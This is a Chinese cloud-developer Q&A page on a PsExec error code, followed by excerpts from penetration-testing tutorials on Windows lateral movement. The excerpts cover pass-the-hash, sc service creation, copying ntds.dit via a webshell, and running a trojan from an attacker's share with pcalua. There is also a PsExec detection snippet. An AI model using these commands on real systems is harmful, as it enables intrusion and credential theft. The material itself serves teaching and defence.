首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

PSExec: cmd在[计算机]上退出,错误代码为-196608

PSExec是一款由Sysinternals提供的命令行工具,用于在远程计算机上执行命令。它通过在远程计算机上创建一个服务来执行指定的命令,并将结果传送回本地计算机。

PSExec的一些常见用途包括远程启动和管理进程、在远程计算机上运行脚本和命令、在无需登录的情况下执行远程命令等。

错误代码-196608表示PSExec在尝试退出远程计算机上的命令时遇到了问题。这个错误代码可能有多种原因,例如权限不足、网络连接问题、远程计算机的防火墙设置等。解决这个问题的方法取决于具体情况,下面是一些可能的解决方法:

  1. 检查权限:确保你具有执行命令所需的足够权限,尤其是在远程计算机上执行敏感操作时。
  2. 确认网络连接:检查本地计算机和远程计算机之间的网络连接是否正常,确保没有任何阻碍PSExec通信的问题。
  3. 检查防火墙设置:确保远程计算机的防火墙设置允许PSExec的通信。你可以尝试禁用防火墙进行测试,如果问题解决,再逐步重新启用并配置防火墙规则。
  4. 更新PSExec版本:尝试使用最新版本的PSExec,以确保使用的是最新的功能和修复了可能存在的错误。

需要注意的是,本回答中提供的解决方法并不基于任何特定的云计算品牌商产品。关于云计算中与PSExec类似的工具,腾讯云并没有对外提供直接替代的产品。但腾讯云提供了一系列适用于云计算场景的产品,包括云服务器、容器服务、批量计算等,你可以根据具体需求选择适合的产品。更多关于腾讯云产品的介绍可以访问腾讯云官方网站。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

内网渗透 | 多种传递攻击详解

前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息基础介绍各种明文或hash传递攻击进行横向渗透。...PsExec的使用不需要对方主机开放3389端口,只需要对方开启admin$共享 (该共享默认开启)。由于PsExec是Windows提供的工具,所以杀毒软件将其列白名单中。...@#45” /uesr:administrator #建立IPC链接,出现下列弹框点击agree psexec \\192.168.3.64 -s cmd cmd #-s,表示以system权限运行窗口...WMI是由一系列工具集组成的,可以本地或者远程管理计算机系统。通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。...使用sc命令横向渗透时,首先也得先建立ipc链接,将要运行的服务拷贝过去目标主机,创建服务:sc \\192.168.3.144 create cmd binpath="c:\cmd.bat"发现可以为目标主机创建服务

14930

通过Webshell远程导出域控ntds.dit的方法

为了实现上述任务,我们将使用“psexec.exe”,如果我们使用“elevated”选项(通过指定-h)指定目标计算机IP、域管理员用户名及其密码,则可以远程Windows计算机上执行命令。...我们需要通过web shellWindows机器“LABONE”上传psexec.exe。从Web shell我们将使用“vssadmin”命令指定AD域控机器IP,域管理员用户名及其密码。...psexec文件将远程执行Windows AD域控计算机上的vssadmin命令。...使用“psexec远程主机上执行命令的常规用法: psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute...最终的命令PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: >

1.4K10
  • 隔空执行的学习总结

    1、计算机对于文件类型分辨方式 计算机对于文件的分辨方式 文件头的作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!!!...,这里图片可以正常显示,通过修改后缀可以切换不同解析,换成压缩包后缀可以重新解析压缩包可以正常打开 ....: 使用pstools微软官方自带的系统插件 准备工作: 1.目标主机的防火墙最好关闭 2.创建/获得对方计算机的用户名密码 直接控制对方cmd psexec \\目标ip -u [目标用户名] -p...[密码] cmd.exe 控制对方电脑运行自己的c盘的xk.exe psexec \\目标ip -u [目标用户名] -p [密码] -c c:\xk.exe 远程运行对方电脑的notepad.exe...提权 处理情况: 1.当前电脑硬盘不能用 2.自己权限不高 目标上运行黑客电脑c盘的xk.exe pcalua -m -a \\黑客ip\c$\xk.exe 这样可以在对方电脑运行自己电脑的一个木马文件

    17620

    内网渗透 - 哈希传递攻击

    域环境中,大量计算机安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。...尤其是 Windows Server 2012 R2 及之后的版本的操作系统中,默认在内存中不会记录明文密码,因此攻击者往往会使用工具将哈希值传递到其他计算机中进行权限验证,实现对其他远程计算机的控制...一些计算机中,SID500的账号即使将默认 Administrator 账号改名,也不会影响SID的值。...域管理员组内用户NTLM hash值:518b98ad4178a53695dc997aa02d455c 由于 Mimikatz 需要管理员权限运行,所以前提需要获取域内任意一台机器的本地管理员权限运行 CMD...建立IPC$连接 net use \\10.10.10.20 # 列出目标机器的C盘文件 dir \\10.10.10.20\c$ 0x03 MSF 首先是通过常规的反弹 shell 操作到msf

    77260

    威胁狩猎系列文章之一到三

    执行 PsExec 是一种轻量级的 telnet 替代品,允许您在其他系统执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件。...PsExec 最强大的用途包括远程系统启动交互式命令提示和 IpConfig 等远程启用工具(查看原本无法获取的有关远程系统的信息)。...(标准的 PsExec 命令(不带 -r 选项)将会安装名为 "PSEXECSVC" 的新服务) 如上所示,使用“ psexec -r spoolsrv \ target -s cmd ”(重命名)选项...幸运的是,我们 5145 事件中仍然有(现在)一个唯一的字符串,我们可以用它来检测 PSEXEC(“stdin”,“stdout”和“stderr”) 检测逻辑: [EventID = 5145 且...123 -s cmd.exe)。

    1.7K30

    内网渗透 | 哈希传递攻击(Pass-the-Hash,PtH)

    域环境中,大量计算机安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。...执行完命令后,会弹出CMD窗口,弹出的CMD窗口我们可以访问域内任何一台机器。前提是我们必须拥有域内任意一台主机的本地管理员权限和域管理员的密码NTLM哈希值。...administrator /domain:xie.com /aes128:4728551c859bbe351e9c11b5d959163e 域控未打 KB2871997 补丁前,无法使用 Key传递攻击 但是当我域控打上...其后果就是:无法通过本地管理员权限对远程计算机使用 Psexec、WMI、smbexec、IPC 等,也无法访问远程主机的文件共享等。...并且在打了KB2871997 补丁的机器,通过将LocalAccountTokenFilterPolicy设置1,也还是可以使用普通管理员账号进行哈希传递攻击。

    2.7K10

    内网渗透测试:内网横向移动基础总结

    我们可以通过at命令通过跳板机目标主机DC创建计划任务,让计算机指定的时间执行木马程序,从而获得对内网目标主机的控制。操作如下: 1. 先与目标主机建立ipc连接。 2....目标主机DC创建一个名称为“backdoor”的计划任务。该计划任务每分钟启动一次,启动程序我们之前到C盘下的shell.exe,启动权限为system。...-p Liu78963 cmd.exe /c "ipconfig"// 用目标系统的cmd.exe的/c选项目标主机上执行命令,并得到回显(与前面的at命令相似) Metasploit下的PsExec.../psexec_command // 目标机器执行系统命令exploit/windows/smb/ms17_010_psexec 使用exploit/windows/smb/psexec_psh...域环境中,用户登录计算机时一般使用域账号,大量计算机安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也相同,攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。

    3.1K10

    域内横向移动分析及防御

    小时 目标机器不需要本地管理员权限即可进行票据传递 五、PsExec PsExec是微软官方PsTools工具包中的软件 起初主要是用于大批量Windows主机的运维,域环境下效果甚好 通过PsExec.../files/PSTools.zip PsExec的基本原理是:通过管道远程目标计算机上创建一个psexec服务,并在本地磁盘中生成一个名为“PSEXECSVC”的二进制文件,然后通过psexec服务运行命令...-accepteula \\192.168.1.10 -s cmd.exe //如果没有ipc$ PsExec.exe \\192.168.1.10 -u administrator -p 123456...cmd.exe 六、WMI WMI(Windows Management Instrumentation)是一系列工具集成 从Windows 98开始支持 可以本地或者远程管理计算机系统 使用wmiexec...Exchange时,SPN就被注册AD中了) Exchange数据库的后缀“.edb”,存储Exchange服务器,使用PowerShell可以查看相应信息 Exchange邮件的文件后缀“.

    1.5K11

    内网渗透 | 横向移动总结

    我们可以通过at命令通过跳板机目标主机DC创建计划任务,让计算机指定的时间执行木马程序,从而获得对内网目标主机的控制。...,这是我之前实战的过程中拿到了一个oa系统的shell,但是这里webshell处不能够执行命令,这时候就可以调用at命令调用cmd执行系统命令 ?...也可以直接执行命令(在建立ipc连接的基础) PsExec64.exe -accepteula \\192.168.10.3 ipconfig ?...接口被定义“在对象实现的一组语义上相关的功能”,其实质是一组函数指针表,每个指针必须初始化指向某个具体的函数体,一个组件对象实现的接口数量没有限制。...很多地方,不支持rc4加密方式的时候,使用pass the key不失一种好方法。

    3.7K20

    内网环境下的横向移动总结

    简单来讲,横向移动是指攻击者成功攻击一台计算机后,由该计算机横向跨越到另一台计算机,获取相关权限,进而窃取敏感信息的活动。...-p -s cmd.exe 这里也可以先建立ipc连接后直接调用PsExec64.exe调用cmd net use \\192.168.10.3\ipc$ /user:administrator PsExec64.exe -accepteula \\192.168.10.3 cmd.exe 也可以直接执行命令(在建立ipc连接的基础) PsExec64...接口被定义“在对象实现的一组语义上相关的功能”,其实质是一组函数指针表,每个指针必须初始化指向某个具体的函数体,一个组件对象实现的接口数量没有限制。...很多地方,不支持rc4加密方式的时候,使用pass the key不失一种好方法。

    3.2K20

    玩转PowerShell第二节——【利用PsExec进行远程调用】-技术&分享

    概述   PowerShell用的最多的地方就是远程调用,远程机器执行脚本,监控远程机器的状态,如NLB状态,EventLog,SqlServer DataBase状态等。   ...3.常用参数 computer   计算机名称,如果省略,则在本机执行,如果是\\*,则在域里面的所有的机器执行脚本 -u 远程机器的域用户名称Domain\UserName -p 远程机器的域用户密码...指定远程机器运行某程序所在的桌面会话session,如果未指定,则在控制台会话中执行 -s 指定在系统账户中运行程序 -w 指定运行程序的工作路径 program 指定运行的程序,如PowerShell,cmd...$Param" 注意: 1.远程机器磁盘上需要有“$WorkPath\Scripts\test.ps1”这个文件; 2.远程机器不需要有PsExec.exe文件。...2)Job中调用 1 $Job = Start-Job -ArgumentList $WorkPath,$MachineIP,$DomainUser,$Password,$WorkPath,$Param

    1.6K80

    红队技巧-常规横向手法

    使用: 第一步先建立ipc共享 第二步使用psexec进入半交互式shell psexec.exe \\\192.168.0.1 cmd 可以直接一步搞定 psexec.exe \\10.10.10.10...而wmiexec是模拟psexec功能的vbs脚本 执行原理: 1.WMI通过账号密码或者NTLM认证(WCE注入)连接到远程计算机。...,通过它可以访问、配置、管理和监视几乎所有的Windows资源,比如用户可以远程计算机启动一个进程;设定一个特WMI允许脚本语言(例如VBScript或Windows PowerShell)本地和远程管理...如果客户端使用ProgID,则首先将其本地解析CLSID。 远程计算机检查是否存在与所讨论的CLSID关联的AppID,并验证客户端的权限。...false关 $a.DDEInitiate("cmd","/c calc,exe") 2.MMC20.APPLICATION 创建MMC20.Application 对象的实例: [activator

    2.1K20
    领券